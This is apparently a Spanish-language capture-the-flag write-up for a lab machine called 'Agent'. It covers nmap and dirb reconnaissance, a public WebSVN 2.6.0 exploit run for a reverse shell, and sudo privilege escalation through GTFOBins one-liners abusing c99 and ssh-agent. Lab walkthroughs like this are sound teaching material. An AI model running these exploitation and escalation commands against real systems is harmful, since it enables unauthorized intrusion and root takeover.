Agent

🔍 Dificultad: Muy Fácil

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 192.168.1.100

para verificar la conectividad de red.

A continuación, se realiza el comando:

nmap -p- --open 192.168.1.100 --min-rate 5000 -n

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP están abiertos por lo que a continuación se indagará más.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p22,80 -v 192.168.1.100

para obtener más información sobre ese puerto específicamente.

Revisamos el puerto 80. Corre un servidor Nginx.

Revisamos directorios.

dirb http://192.168.1.100/

Encontramos un directorio llamado /websvn.

🚀 EXPLOTACIÓN

Comprobamos que la versión sea vulnerable.

searchsploit websvn 2.6.0

Nos lo descargamos y cambiamos la IP para una Reverse Shell.

Ejecutamos mientras estamos en escucha.

python3 50042.py "http://192.168.1.100/websvn"

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

whoami

aún no somos root, por lo que hacemos:

sudo -l

para ver si hay algo para explotar.

c99 | GTFOBins

sudo -u dustin /usr/bin/c99 -wrapper /bin/sh,-s .

Realizando el mismo proceso encontramos que dustin tiene permisos SUDO en el binario ssh-agent.

ssh agent | GTFOBins

sudo -u root /usr/bin/ssh-agent /bin/bash